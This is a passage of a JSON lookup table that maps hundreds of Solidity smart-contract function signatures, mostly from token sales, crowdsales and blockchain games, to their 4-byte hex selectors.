"0x107f76c5", "submitBuyOrder(bytes32,uint256,uint256)": "0x049eb289", "setAssetFees(address,uint256,uint256)": "0x02dcfc8e", "ownerSetAllowPublicWithdraw(bool)": "0x7d3533da", "ownerSetCrowdsaleClosed(bool)": "0x5e24de11", "withdrawAmountTo(uint256,address)": "0xb1237eae", "calcRefund(address,address)": "0x4611a5e3", "publicWithdraw()": "0xba00660f", "applyToken(address)": "0x1612ec4f", "withdrawAirDrop(address[],uint256)": "0xa985e6c6", "withdrawComB()": "0x7a3abce9", "ZIRC()": "0x3ea51dc2", "EABToken(string,string)": "0x787091e9", "batchDistributeWithAmount(address[],uint256[])": "0xcdd13589", "AirwayBill()": "0xe6e5b492", "WNCT()": "0xda5c7ec2", "AntPetTempleToken()": "0xbdf99bd4", "getMyLastScore()": "0x4be04fd9", "checkRoundEnd()": "0x4a825c68", "ChangeSymbol(string)": "0x182092a8", "getPeriodAliasFor(uint256,address)": "0x24ed1486", "getPeriodLockedBalanceFor(uint256,address)": "0xd57f62ff", "getPeriodReceivedBalanceFor(uint256,address)": "0xcc06f5ea", "getPeriodSealedPurchaseOrderFor(uint256,address)": "0x250e816b", "getPeriodMinting(uint256)": "0x36a0f511", "getPeriodOwnerLockedBalance(uint256)": "0xef9da13d", "getPeriodTotalReceived(uint256)": "0xf951f856", "getPeriodStarted(uint256)": "0xe276729d", "calculateEmission(uint256,uint256)": "0xde385438", "currentPeriodIndex()": "0x61543801", "calculateMinting(uint256)": "0xd825ebc3", "withdrawOwnerUnrevealed(uint256,address)": "0x41ecd1cd", "placeOpenPurchaseOrder(address)": "0xb19a5f62", "revealPurchaseOrder(bytes32,uint256,uint256,bytes32,address)": "0xf09dd844", "placePurchaseOrder(bytes32)": "0x097dfa2f", "createPurchaseOrder(address,uint256,uint256,bytes32)": "0x818f92c7", "checkExpires(bytes32)": "0x9a47700f", "freeSub(address,uint8,bytes32)": "0x834614dd", "subscribe(address,uint8,bytes32)": "0xf40c0843", "subscribeMe(uint8,bytes32)": "0xa78810f8", "setAnnualPrice(uint256)": "0x8e236cea", "setMonthlyPrice(uint256)": "0x53cfdda3", "multiGenerate(address,address[],bytes)": "0xf725839f", "toBytes(uint256,uint256)": "0xdf2b1cf8", "copy(uint256,uint256,uint256)": "0xf5088730", "AnteilToken()": "0x431e0a48", "useInsurance(uint256)": "0x17a523c1", "isDailySettlementOnGoing()": "0xe480ba6a", "isExchangeAlive()": "0x985bdd43", "setServiceRegistryEntry(uint256,address)": "0x731c7c62", "unFreeze(uint256)": "0xd302b0dc", "transferFromAndLock(address,address,uint256,uint256,uint256)": "0xed287795", "transferAndLock(address,uint256,uint256,uint256)": "0xf5c233f1", "buyInWithAllBalanced()": "0xe408de80", "setWhiteListAgent(address)": "0xa4ef2cbb", "transferPreSaleBalance(address,uint256)": "0x4eeea29d", "preSaleBalancesOf(address)": "0xb993a53e", "saleTokens(address,uint256)": "0x4ecb1390", "setFreezTime(uint256)": "0x23b7b140", "burnRemain()": "0xb314a984", "PPToken()": "0x6d4fd338", "PPToken(uint256,uint256)": "0x14dba3ba", "updateRequestSeed(bytes32,bytes32)": "0x08434ef5", "checkItem(bytes32)": "0x5f065b4a", "addItem(bytes32)": "0x2c95ad52", "getPublicForSecretFor(bytes32)": "0x935d647f", "Products()": "0x5284b044", "valueFromPercent(uint256,uint256)": "0x2d910376", "setLandPrice(uint256,uint256)": "0xf1d15f1f", "setFirstRankForFree(bool)": "0xd0d38b65", "stopPresale()": "0x1ad2ad1a", "openLandEthSale()": "0x33a02a6d", "stopLandEthSale()": "0xc2eef08e", "setCandyLandSale(address)": "0x4ce149d7", "setCandyLand(address)": "0xb9b842e5", "setUserRank(address)": "0x2779eb52", "isUnicornContract(address)": "0x541334f6", "delUnicornContract(address)": "0x3d11fa43", "setUnicornContract(address)": "0x0480c975", "megaCandyToken()": "0xff8028b3", "LandManagement(address)": "0x543577f3", "PARAMOUNT()": "0xa6ca0a98", "updatePartner2_will(string)": "0x81f2d4ee", "updatePartner1_will(string)": "0x7ae6b763", "updatePrenup(string)": "0x705bbf6b", "updateMarriageLicenceImageIPFShash(bytes)": "0x46c797e2", "updateCoupleImageIPFShash(bytes)": "0xf50ab7b0", "voteToUpdatePrenup()": "0xbb07576d", "voteToUpdateMaritalStatus()": "0x6033cdc6", "updateMaritalStatus(string)": "0x77790081", "updatePartner2_vows(string)": "0x391b11ce", "updatePartner1_vows(string)": "0xc6998dc2", "saveContractEvent(string,string)": "0x2faf1895", "saveLifeEvent(string,string,string)": "0x75e96908", "addLifeEvent(string,string,string)": "0xb53c71b6", "SmartVows(string,address,address,string,address,address,string,string,string,string,string,string,string)": "0x069984c9", "Util()": "0xa365f3cc", "failICO()": "0xacdc42f3", "buyTokensWithRef(address)": "0x33b5fa75", "processInvestment(address,uint256,address)": "0x505ba497", "getTokensCountPerEther()": "0x8eccf58e", "rewardContributors(address[],uint256[])": "0x56ebb303", "sendTokensToBountyWallet(address)": "0x441628f1", "setExchanger(address)": "0xda909b09", "AlphaMarketICO(address[])": "0x89d5da3b", "MOTCToken(uint256,string,string)": "0x35af5a9c", "BailOutToken()": "0x18ce1a23", "readFromCart(address,uint256)": "0xbd478fcb", "getSandwichInfoCaloriesPrice(uint256)": "0xc54cd39c", "fillContract()": "0x215ac4be", "createApprovalEvent(bool,address,address,uint256)": "0x74bdb7ee", "createTransferEvent(bool,address,address,uint256)": "0x1ce477d8", "getGasForMcrData()": "0x8f3e8747", "proxyManagementAddress()": "0x1beb375d", "fundManagementAddress()": "0x6e98a92b", "getGasForMcr()": "0xa2b144f0", "setMcrAmountForGas(uint256)": "0xe3dea4b7", "setWeiForMcr(uint256)": "0x5a74a715", "emergencyLock()": "0xd9c693cb", "setFundManagementContract(address)": "0x1703c11a", "setProxyManagementContract(address)": "0xbb5adf14", "setDescrutionContractAddress(address)": "0x26cb83b9", "setTokenCurator(address)": "0x8908e693", "approveViaProxy(address,address,uint256)": "0x80a5cca3", "MacroTokenContract()": "0x3792a865", "getFundAlterations()": "0x908dd411", "fundsCombinedValue()": "0x01ce5e75", "dedicatedProxyAddress()": "0xc6798033", "raiseApprovalEvent(address,address,uint256)": "0x0619978d", "raiseTransferEvent(address,address,uint256)": "0x967a08f7", "isProxyLegit(address,address)": "0x6bc0f7fb", "Betcash(uint256,string,uint8,string)": "0xd7f0df73", "SLAV()": "0xf019c941", "PriceOracle(uint256)": "0x1d376a44", "SMARTCCCoin()": "0xc5b9cdf8", "costAndBuyTokens(uint256,uint256)": "0x654d146a", "doBuy(address,uint256)": "0xdcdc055a", "buySeele(address)": "0x30232cb0", "saleNotEnd()": "0x4f93995d", "addWhiteList(address,bool)": "0xa718d11b", "setWhiteList(address[],bool)": "0xe43f696e", "SeeleCrowdSale(address,address,address)": "0xb244b268", "DomenoToken()": "0xf6233016", "TranchorToken(uint256,uint256,address,address)": "0x2a89d1bc", "setTeamAndAdvisorAndAirdropAddresses(address,address,address)": "0xc5498e4e", "mintTokensFor(address,uint256)": "0x8f6811a3", "EosChain()": "0x29eae264", "sendPreSaleETH()": "0x86d53469", "STRIMToken(address,address,uint256,uint256)": "0xa67eb8d7", "setPreSaleEndDate(uint256)": "0x42f0ca0d", "setPrivateSaleEndDate(uint256)": "0x9d5c6e20", "getICOEndDate()": "0x1379c6e0", "getPreSaleEndDate()": "0x02a10d87", "getPrivateSaleEndDate()": "0x46134e33", "addONG_AUDIT(bytes32,string,string,bool)": "0x5e2d13af", "getONG(bytes32)": "0xd867bb25", "getONG_AUDIT(bytes32)": "0x6bc789cd", "TestAuditor()": "0xdb618c08", "SimpleERC20Token(uint256)": "0x134741f7", "changeDivCardAddress(address)": "0x994b1a0f", "devTokenWithdraw(uint256)": "0xdb9090a7", "retrieveTokens(address,uint256)": "0x34e8c679", "dailyAccounting()": "0x815dcd36", "queryTokenGrant(address)": "0x3192cccb", "alterTokenGrant(address,uint256)": "0xecbd15fd", "contractTokenWithdraw(uint256,address)": "0xe50dd26a", "setDailyTokenLimit(uint256)": "0xbf03ef7d", "permissibleTokenWithdrawal(uint256)": "0xa21383cb", "buyAndSetDivPercentage(address,uint8,string)": "0x724fcd4c", "WyzonCredit()": "0xfda9aafe", "freezeAccount(bool)": "0xb7288f02", "MyAdvancedToken(uint256,string,string,address)": "0x44c040a6", "IMDESale(uint256,uint128,uint256,uint256,uint128,string)": "0x84e527ad", "Mag50()": "0x542d8dc0", "masicotestToken()": "0xab7f8f12", "getYays(uint256)": "0xa69c22be", "getYayNum(uint256)": "0x65c24799", "isVotedGood(uint256)": "0x38d4d73e", "quit()": "0xfc2b8cc3", "voteForTransaction(uint256)": "0xcd9745f2", "proposeTransaction(address,uint256,bytes)": "0x5e90852d", "Luxury()": "0x625b666c", "NigeriaNairaToken()": "0x4bca7f95", "getCustomerRating(string)": "0x8eafe0f0", "getCustomerBankRating(string)": "0xe979bac1", "getBankRating(address)": "0xb8144a72", "getBankKYC(address)": "0x4ec2b417", "getBankReg(address)": "0x9ac3fce6", "getCustomerBankName(string)": "0xf9dc0793", "getBankEth(string)": "0x5b3de1c8", "getBankName(address)": "0x01da7b31", "setPassword(string,string)": "0xca386496", "checkCustomer(string,string)": "0x4b726f61", "checkBank(string,address)": "0xc17d8720", "updateRating(address,bool)": "0x7d2f42c3", "updateRatingCustomer(string,bool)": "0xbbd4edb1", "viewCustomer(string)": "0x107925bb", "modifyCustomer(string,string)": "0xf72860ca", "removeCustomer(string)": "0xfc55ea9d", "addCustomer(string,string)": "0x3190abc0", "removeBank(address)": "0x9649650c", "addBank(string,address,string)": "0xccfa8e71", "isPartOfOrg()": "0xd06760da", "allowBank(string,address,bool)": "0x39b83b68", "addRequest(string,address)": "0x8873704c", "getBankRequests(string,uint256)": "0xc71029e1", "ifAllowed(string,address)": "0x1cfb7c9a", "buyTrack(address,bytes32)": "0x081bde95", "dislikeArtist(address)": "0x40b74c91", "likeArtist(address)": "0x6a0c3809", "dislikeTrack(address,bytes32)": "0xc238999b", "likeTrack(address,bytes32)": "0xdb62df0e", "getArtistTrack(bytes32,address)": "0x4fa43991", "canDownload(address,address,bytes32)": "0x060d4f0d", "NXETToken()": "0xb5af411f", "getTracks()": "0x87548fcf", "registerAlbum(bytes32[],bytes32[],bytes32[],bytes32[],bytes32,bytes32)": "0x3d9e4233", "registerTrack(bytes32,uint256,bytes32,bytes32,bytes32)": "0x1b17595f", "_rewardUnnapprovers(address)": "0xa0d39949", "_rewardApprovers(address)": "0x7cd4559c", "_registerArtist(address)": "0x9dc4ef99", "getUnapprovedArtists()": "0x25799b18", "unapproveArtist(address)": "0x8726baf7", "approveArtist(address)": "0x59424b78", "_unregisterArtist(address)": "0xb14a44ac", "getArtistList()": "0x8f55a850", "requestForArtistRegistration(bytes32,bytes32,bytes32)": "0xb14201d0", "isArtist(address)": "0x6b2f65b0", "getTokensToSend(uint256)": "0x89fe5273", "_mintToken(address,uint256)": "0xbb6a55bd", "XET2()": "0x9003ff51", "announceVictory(string)": "0x7d094533", "announceEndOfGame()": "0x012b1f73", "setKing()": "0x0280052d", "SecuritiesVaultBank()": "0xcc851cac", "NevadaBlackBook(address)": "0x97848574", "DissolveBusiness()": "0x308dc720", "calculateTotalPayoutAmount()": "0xa05809ff", "setWinningTeam(uint256)": "0xecce7e63", "__callback(bytes32,string,string)": "0xb2d4ae5e", "claimPayout()": "0xe88499a9", "warningERASEcontract()": "0xe6120842", "fundsToAddress(address,uint256)": "0x9635eaf7", "fundsToOwner(uint256)": "0xcb16415f", "refundToken()": "0x5cb732be", "setRefund(bool)": "0x7e42f8b4", "usersCanSell(bool)": "0x40710587", "HardCapReached()": "0x9788c342", "SoftCapReached()": "0x629c1b67", "setupWeiCaps(uint256,uint256)": "0x32820d5f", "setupICOPrices(uint256,uint256,uint256,uint256)": "0xddd53cc5", "isICOOver()": "0xbdc8e551", "setupICO(uint256,uint256,uint256,uint256)": "0x2620fd4a", "blockContract()": "0xeb90fff8", "disableContractUpgradability()": "0xa8fa14b0", "NumeraireBackend(address[],uint256,uint256)": "0xe809046f", "disableStopping()": "0xd08b89f3", "StoppableShareable(address[],uint256)": "0xb25a80f4", "changeShareable(address[],uint256)": "0x788023ff", "getMintable()": "0xf698bceb", "refundCoin(address)": "0x1c27e291", "burnCoin()": "0x2d56af6c", "withdrawEtc(address,uint256)": "0x40ae0851", "withdrawMkt(address,uint256)": "0xcd71a471", "withdrawAdvisor(address,uint256)": "0x1b464764", "withdrawGemmyMusic(address,uint256)": "0xd68526c8", "withdrawFoundation(address,uint256)": "0xc1857bf7", "withdrawRewardPool(address,uint256)": "0x9aa1001b", "removeSecondAdvisorLock(address)": "0xecc258dd", "removeFirstAdvisorLock(address)": "0xf7e0e743", "removeGemmyMusicLock(address)": "0x4de62cd6", "removePersonalLockMultiple(address[])": "0x130bcaa2", "removePersonalLock(address)": "0x4bd889b4", "removeTotalCoinLock()": "0x9a336fed", "isPersonalLock(address)": "0xe065914c", "isTransferLock(address,address)": "0x23f938ee", "buyCoin()": "0x091e9a60", "atNow()": "0x81aea668", "Logo(address,address,string)": "0x318077a1", "claimReward(address)": "0xd279c191", "DezToken()": "0xabb2874f", "referralsOf(address)": "0x831aba43", "ProofOfCommunity()": "0x47d01637", "TreasureToken(address,address)": "0x6f704aa6", "setCurrentBadge(bytes32)": "0x3267db34", "sizeOfProviders()": "0x23858314", "getProviderBadge(address)": "0xd7f6f81c", "indexOfProvider(address)": "0x7c5817e1", "isRejected(address)": "0x48a46bd3", "isProvider(address)": "0x6b074a07", "rejectProvider(address)": "0x0b4c72a9", "acceptProvider(address)": "0x9f9fe6bb", "deactivateProvider(address)": "0xbba9dc60", "activateProvider(address)": "0x43fe32fc", "removeProvider(address)": "0x8a355a57", "addProvider(address)": "0x46e2577a", "isMod(address)": "0x8988b284", "removeMod(address)": "0x4637de3c", "addMod(address)": "0x01a00216", "CanYaDao()": "0xbf0b88aa", "BangdiToken(address)": "0x6fdc45a3", "transferBalance(address)": "0x63b6b31f", "thisweek()": "0xe784a923", "availableAirdrop(address)": "0x6f11a859", "transfererc20(address,address,uint256)": "0xfc331ebb", "Award(address,uint256)": "0x473edf73", "RecordTransfer(address,address,uint256)": "0xe761eec6", "availableSupply()": "0x7ecc2b56", "getPurchaseAmount(uint256)": "0xd2f3ea43", "getPurchaseAddress(uint256)": "0xdaf32370", "getNumberOfPurchases()": "0x8aee0443", "getCurrentState()": "0x378aa701", "getCrowdsaleManager()": "0x6677cef1", "getTokenManager()": "0xab97d59d", "AdifyToken()": "0x1ec8a460", "getCurrentSale()": "0x5c64bb72", "getTotalCollected()": "0xfbe5d87e", "setGlobalMultisigWallet(address)": "0x82b1fb0d", "closeAllSales()": "0x78990684", "removeLastSaleOnlyNotActivated()": "0xef81eb57", "activateLastSale()": "0xcd8df8ec", "createSale(string,uint256,uint256,uint256,uint256)": "0xe67fcd10", "calculateTokensQtyByEther(uint256)": "0x8e32217a", "initBonuses(string)": "0xb9890a74", "getRestTokenBalance()": "0x55b954ad", "setDevelopmentAuditPromotionWallet(address)": "0xe567756f", "setFoundersWallet(address)": "0x119cc328", "setToSaleWallet(address)": "0xe930f06f", "setBountyWallet(address)": "0x8a9d3839", "setDevelopmentAuditPromotionTokensPercent(uint256)": "0x44d15446", "setPriceOfToken(uint256)": "0xca1c8895", "DLCToken()": "0xdde2fc22", "pullTokens()": "0x0e274eab", "setPriceInWei(uint256)": "0x8774e5d0", "Potentl()": "0x4c7241f8", "ColorBayToken()": "0x72076c57", "Etokenchain()": "0x2d449b5e", "withdrawTokenFromCrowdsale(address)": "0x58a87b69", "transferToCrowdsale(address,uint256)": "0xa2a51ccd", "changeBonus(uint8)": "0x5ab9bb26", "PreTgeExperty()": "0xe0f7b44d", "distribute(address[],uint256[])": "0x2929abe6", "halfPercent(uint256)": "0x95c5a2cc", "CellBlocksToken()": "0xe20d35ad", "PrivateSocialPlatform()": "0xa4bc51d4", "Presale(address,address)": "0x5d98fd9f", "CanYaCoin()": "0x9f2b22c7", "Wscchain(uint256,string,string)": "0x7c7ead51", "Betportchain(uint256,uint256)": "0x2b9e05d1", "PhillionToken()": "0x36c8e831", "transferEthToMultisig()": "0x476a73ec", "transferTokenToMultisig(address,address)": "0xebeb1b5e", "procureTokens(address)": "0xc70dd8b3", "setrateIco(uint256)": "0x00573858", "setVariationAddress(address,address)": "0xe1a29a3f", "setLotteryAddress(address,address)": "0x9d88f3a1", "DogCore()": "0x5bf339b1", "computeNextGen0Price()": "0x0e0bc104", "createGen0Dog(uint256)": "0xab0a9865", "bidOnSaleAuction(uint256)": "0xad25ce57", "bid(uint256,address)": "0x9f04996d", "computeCut(uint256)": "0x2d3a926a", "_bid(uint256,uint256,address)": "0x445045cc", "_createDog(uint256,uint256,uint256,uint256,address,uint8,uint256,bool)": "0xd6a9c807", "setGen0Profit(uint256)": "0xa5ef0dd6", "isVariation()": "0x27757c49", "SiaCashCoin()": "0x9a4b19e4", "CTTCToken()": "0x8a96e27e", "updateImageAddress(string)": "0x7e83185b", "updateContact(string)": "0x424fffda", "updateDescription(string)": "0xe735b48a", "updateName(string)": "0x84da92a7", "preValidateChecks(address,uint256,uint256)": "0x49212c92", "PrivatePreSale()": "0x203dacb9", "validateWhitelisted(address)": "0x4d126774", "burnWithDecimals(uint256,uint256)": "0x2fad380d", "QTX()": "0x3c3e6af4", "GYG()": "0xac96a0b3", "costAndBuyTokens(uint256)": "0x8dedeca8", "buyCommon(address,uint256,uint256)": "0xa1a71a20", "buyFromPartner(address)": "0x95cc74fe", "buyWanCoin(address)": "0xdf4ebd9d", "setPartnerQuota(address,uint256)": "0xba5233b2", "setNormalBuyLimit(uint256)": "0x40a50a5e", "WanchainContribution(address,uint256)": "0x3b7773cd", "WanToken(address,uint256,uint256)": "0x3266c856", "initializeCoins()": "0x6e4a7b26", "createToken(string,string,uint8,uint256,address)": "0x5165749e", "HighCoin()": "0xe7bfcf57", "sum(uint8[])": "0xb30bca06", "getDealerValue(uint8[],uint8)": "0xaeaa3091", "playHand(uint8,uint8,uint8,uint8[5],uint8[],uint8[],uint8[])": "0x902c92b7", "getPlayerValues(uint8[],uint8[],uint8[])": "0x661e5ec2", "determineOutcome(bytes32,uint8[],uint8[])": "0xe6acf0c1", "convertToBytes(uint8[],bytes1)": "0x1070f410", "checkDeck(bytes32,uint8[],bytes32)": "0xaf1747aa", "gameExists(bytes32)": "0x754db89b", "stand(uint8[],bytes32,uint8[])": "0xf78fe0e9", "split(bytes32,uint8,uint256)": "0x9be4d15e", "double(bytes32,uint8,uint256)": "0x900a0285", "initGame(address,uint256,bytes32,bytes32,bytes32)": "0xa4bb1324", "blackjack(uint256,uint256)": "0x17255086", "setMaximumBet(uint256)": "0x20ae2059", "casino(uint256,uint256)": "0x03f11878", "PapaBearToken()": "0x83975e7d", "CCLToken()": "0x91baabba", "RC()": "0x2cdf55af", "TokensWorld()": "0x2ce91d08", "getNumTokens(uint256)": "0x2119249f", "Crowdsale(address,address,address,uint256,uint256,uint256)": "0x7ed5d621", "DelVer(address,address)": "0xaeddaa02", "Verification()": "0x80947d17", "Diatom()": "0x963dd1dd", "POWH33()": "0xa936444a", "AddEth()": "0x472b6492", "_import_island(bytes32,address[3],uint256[7],uint256[8])": "0xc15f817d", "_create_island(bytes32,address,uint256,uint256,uint256,uint256)": "0x72ece81c", "getIslands()": "0xdeb081df", "getIslandPreviousOwners(uint256)": "0xe6e05562", "getIsland(uint256)": "0x913158f7", "getIslandBattleStats(uint256)": "0xdc3134ae", "offMaintenance()": "0xd5ea36f9", "onMaintenance()": "0x952868b5", "withdrawTreasury(uint256)": "0x11f1fc99", "buyShips(uint256,uint256,bool)": "0x61b98cb3", "attackIsland(uint256,uint256)": "0x94b66386", "importIsland(bytes32,address[3],uint256[7],uint256[8])": "0x0d28f8d1", "createIsland(bytes32,uint256,address,uint256,uint256)": "0xb5dd20e9", "stopSell()": "0x61aebe59", "starSell()": "0x6aa31b1f", "stopBuy()": "0x493a7209", "starBuy()": "0xcdd2ef0c", "validTransfer(address,uint256)": "0xbed0d1b9", "TEGTY()": "0xdeab5a78", "GlobaleCash()": "0x5be53284", "checkIfWhiteListed(address)": "0x719f8d3a", "ETHEREAL()": "0xea15f262", "MasonCoin()": "0x06fa01b1", "createOnDay(uint256)": "0x5ca81139", "stringToAddress(string,address)": "0x6b4b1f3a", "digitToNumber(uint8)": "0xdf19b71c", "LNCHSale(uint256,uint128,uint256,uint256,uint128,string,uint128,string,uint128,string,uint128,string,uint128,string)": "0xc8f5c3f9", "MyWishChain()": "0x023c19ce", "sellingDisable()": "0x2f386a8e", "sellingEnable(uint256)": "0xef14adc7", "Rhodium()": "0x695ca8c8", "_vestedAmount(address)": "0x6c3e8e19", "airdrop(address)": "0x21860a05", "addVestingForBeneficiary(address,uint256)": "0xe6da89cd", "_releasableAmount(address)": "0xb2bcf495", "airdropMultiple(address[])": "0xfd507f75", "releaseMultiple(address[])": "0x24a43c51", "addVestingForBeneficiaries(address[],uint256[])": "0x66552e15", "issueIndividualTokens(address,uint256)": "0xe8a0d312", "firstStagePriceOfTokenInWei()": "0x82a352e4", "PARTNERS_ADDRESS()": "0x1fe6189e", "soft_cap()": "0x78e2df0e", "Bithereum()": "0xc25acada", "tokenLockTime()": "0xebe749d3", "battlesOwner()": "0xd7276479", "crowdSaleAllowance()": "0xd14ac7c4", "aix()": "0xdad7ad9e", "authorizer()": "0xd09edf31", "soulsSold()": "0x2bb20f4a", "getCurrentProvider()": "0x40890bc2", "buynowPrice()": "0xa87595ce", "tokenForSale()": "0x3970f698", "randomQueryID()": "0xc1a3bda5", "erc20ApproveChecking()": "0xef765af8", "multiAccessRequired()": "0xc23693e0", "ICO_END()": "0x0c07fa56", "THRESHOLD1()": "0xf996c697", "gamePlayed()": "0xbfba1e8d", "closingTimeForCloning()": "0x0991f5a6", "numDistributions()": "0x4472287e", "gameActive()": "0xf020044f", "teamContact()": "0xe5707fa2", "getSupernovaBalance()": "0x4e6d739d", "getRoundRemaining()": "0x788e2c3c", "holderAdvisorsTokens()": "0x4559b2e8", "noOfTiers()": "0xdd301057", "totalReceivedWei()": "0xde625d1f", "STTadmin1()": "0x6a5c44a9", "TotalGenesisAddresses()": "0x99cfe743", "isMinimumInEther()": "0xc6476fe9", "maxSeedStage()": "0x0d7a90c8", "checkIfAllARTDistributed()": "0x1dc615bc", "totalEtherGooResearchPool()": "0x38198c65", "buyerCapLowEther()": "0x732fe2ff", "_fees()": "0xd212a69a", "balanceOfOn()": "0xdeb93b5b", "presaleStartTimestamp()": "0x4ea37fec", "countHolders()": "0x033c6ee6", "valueOfContract()": "0xa4a0d801", "TOTAL_SUPPLY()": "0x902d55a5", "teamAddressThree()": "0x7bd216c6", "AvailableCommission()": "0x605a8ea3", "alreadyRegisteredMessage()": "0x2b81b8a4", "buy5()": "0xd84201bf", "RANGEEND_1()": "0x1cc78eb6", "unrestricted()": "0x26278f86", "lastPauseTime()": "0x91b4ded9", "beatGame()": "0x08f10999", "ICOmint()": "0xef92742e", "requestCancelationTime()": "0xfd8bcf6d", "TRANSFER_PROXY_VEFX()": "0x45164b3e", "salesContract()": "0xb1d3ea61", "potTime()": "0xf05a64bc", "unlockSupply()": "0xa8dc824c", "usdEstimateInContract()": "0x3d2fbd0a", "reserverWallet()": "0xca37f7d9", "JACKPOT_WALLET()": "0x66081ec1", "upgradeController()": "0x87543ef6", "Develop()": "0x886c0ee6", "feePromille()": "0xdc3ef685", "spardosenName()": "0xec1b375a", "blocksToLive()": "0xbfcf73e7", "VOTING_PERIOD()": "0xb1610d7e", "custodian()": "0x375b74c3", "sellingPrice()": "0x12821b5e", "tournamentEndBlock()": "0x4474809f", "updater()": "0xdf034cd0", "earlyBackersWallet()": "0x15613495", "presale_end_block()": "0xcd5ba978", "getListingContractAddress()": "0xb2baede4", "maxActivatedSalesTotalCount()": "0x6a294a80", "etherEscrowAddress()": "0x495e1b3d", "getSurname()": "0xacc823f8", "maintainer()": "0x9850d32b", "lastFeePeriodStartTime()": "0xc9fd83e2", "descendingCount()": "0x48c4d7ce", "beneficiaryContract()": "0x6a66a693", "totalMIT()": "0x4bafa2a4", "percentageCut()": "0xf4f42246", "PRE_SALE_START_TIME()": "0x5381464c", "medalSymbol()": "0xdd86210a", "bonusToken()": "0x41d4a1ab", "advisor1Sum()": "0x8f541730", "numArticlesPublished()": "0x5bc07110", "transferEnable()": "0x242654a2", "getAdminDashboard()": "0xe66e00f8", "teamsCreatedCount()": "0x07def80d", "EARLY_BIRD_SUPPLY()": "0x0bd3ae61", "currentDayTS()": "0xe6aac98f", "special()": "0xce9a3b0f", "getBylawsProjectDevelopmentStart()": "0xd427ce74", "bonusesSold()": "0xb02af038", "weiPerWholeToken()": "0x82fa7f8b", "advisers()": "0x4f6cb43f", "CLASS_AQUATIC()": "0xc3cd9996", "bountyPercentage()": "0x63e4e5cc", "level_7_percent()": "0x6d650b2d", "initialBeating()": "0xf2abd01d", "vestPartnerEquityReserve()": "0x6840c67d", "OkLive(uint256,string,string)": "0xc461889e", "iCarChain(uint256,string,string)": "0xedf69f2b", "IINEToken()": "0x74d42916", "H2OC()": "0xfb8a5bf8", "ChinaInvestmentExchangeToken(uint256,string,uint8,string)": "0x60e30a02", "addPlayerOrder(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x7ea84748", "upRoundID(uint256)": "0xeeb8a8a9", "inactivate()": "0xd82c6df4", "buyCore(address,uint256,string)": "0x5d56550a", "buyKeyUseBalance(uint256)": "0x23e1d351", "buyKeyWithReff(string)": "0x192014f4", "nDEX()": "0x49260304", "SEC(uint256,string,string)": "0x440a16c4", "FUC(uint256,string,string)": "0x2669268b", "FILMToken(uint256,string,uint8,string)": "0xb9bdbbbb", "GlobfoneToken()": "0x73335b46", "CABoxCrowdsale()": "0x1a3b8bad", "withdrawVPCxTokens(address)": "0x4a44664b", "VPCx()": "0xa2f23659", "TbookToken(uint256,string,string)": "0x85d559ee", "KONSTANTOR()": "0x87e42622", "Cygnus()": "0xb8fbe499", "ArsenalvsManCity()": "0x172a9438", "ZaiZaiCoin()": "0x545342a0", "batchcollecttaxes(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x7a5ced61", "batchcreatevillage(uint256)": "0x349a373b", "CatexToken()": "0x6c0db60e", "setOwnerToken(address)": "0x3ba2aaf2", "retrieveTokens(address,address,address)": "0x147e14a4", "customCreateTokens(address,uint256)": "0x3382ac57", "setTotalCapitalization(uint256)": "0xc62662f2", "setAltCapitalization(uint256)": "0x10ccbe66", "setPeriodRound(uint256)": "0x621f7e45", "setStartRound(uint256)": "0x0d567f38", "MinterStorePoolCrowdsale()": "0xdd898fa2", "RejekiKita()": "0x0b4f79a1", "Rbank()": "0x5bd7b9fd", "rescueToken(address[],uint256[])": "0xff1780ec", "FIGHTMONEY()": "0x3df2d6fd", "releaseableBalanceOf(address)": "0xb8c78391", "vestTokens(address,uint256)": "0x632a3e52", "createSaleTokensVault()": "0x2025e52c", "approvePayment(uint256)": "0xde14c818", "rejectPayment(uint256)": "0x8d920b02", "requestPayment(uint256,uint256)": "0x0c486a96", "addPayment(uint256,uint256)": "0x4d0a391c", "getNumPayments()": "0x16bf4657", "collectPayment(uint256)": "0x4795ac60", "BitBoscoin()": "0x5c0ba18e", "RealTract(uint256,string,string)": "0x39495f8e", "burnOwnership(address)": "0x299f7200", "ContractOwnershipBurn()": "0x399f6248", "daysMinutesTilExpiryTime()": "0xd5020ce8", "expiryTime()": "0x99bc0aea", "verifyOwnership()": "0x92a42704", "payUp()": "0xa3045113", "stopGame()": "0x83bd72ba", "stopTest()": "0xbdf88d34", "purchase(uint256,address)": "0xae77c237", "getStrong(address)": "0x87f0b8c5", "Testtoken4()": "0xd04dbdea", "CPX(uint256,string,string,address)": "0xdcfac095", "SatoExchange()": "0x7c3625e3", "resetOwner()": "0x5f06541d", "CETFToken()": "0xa3006f5f", "NeonCoin(uint256,string,string)": "0x89a2662f", "getEtherBack()": "0xfd68610f", "isLinkClaimed(address)": "0xb2e357b4", "withdraw(address,address,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0xd2874e49", "checkWithdrawal(address,address,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0xc3886f61", "verifySignature(address,address,address,uint8,bytes32,bytes32)": "0x51f96d33", "DeClub(uint256,string,string)": "0xb8f5e56c", "transferEthToWallet(uint256)": "0xf6ef97ff", "subAddressToWhiteList(address[])": "0x1d7ca2be", "addAddressToWhiteList(address[])": "0xdfa9b440", "setWhiteList(address,address,uint32)": "0x01e4abc1", "GAX()": "0xab7e50ba", "BitcoinLegendToken()": "0x29ed0f06", "Easy()": "0x3e412533", "getCustomerTxOrigMcwTransfer(address,bytes32)": "0x5d385031", "addTxToCustomerRegistry(address,bytes32,uint256,uint256)": "0xf3942753", "getTxOrigMcwTransfer(bytes32)": "0x772b7a73", "addTxToRegistry(bytes32,bytes32,uint256,uint256,uint256)": "0x2729f44e", "getEndClaimDate()": "0x2d93a44e", "getStartClaimDate()": "0x90ee4331", "transferEthTo(address,uint256)": "0xad38fba5", "setSaleAgent2(address)": "0x8f26a5ab", "REELToken()": "0xd3a871e9", "CoinwareToken()": "0x8973d0cf", "TrustTokenERC20(uint256,string,string)": "0xac781fbe", "TMBCStandardToken(uint256,string,uint8,string)": "0x0a864240", "tokenURI()": "0x3c130d90", "transferAndBuy(address,uint256,uint256,uint256)": "0xaa9454b5", "removeTrader(address)": "0x0a1f194f", "addTrader(address)": "0x5d428e08", "calculateReleased()": "0xb545ddf5", "allocatedBalance()": "0xe53ecb79", "releasedBalance()": "0x9ab4b22f", "freeBalance()": "0x25185d3e", 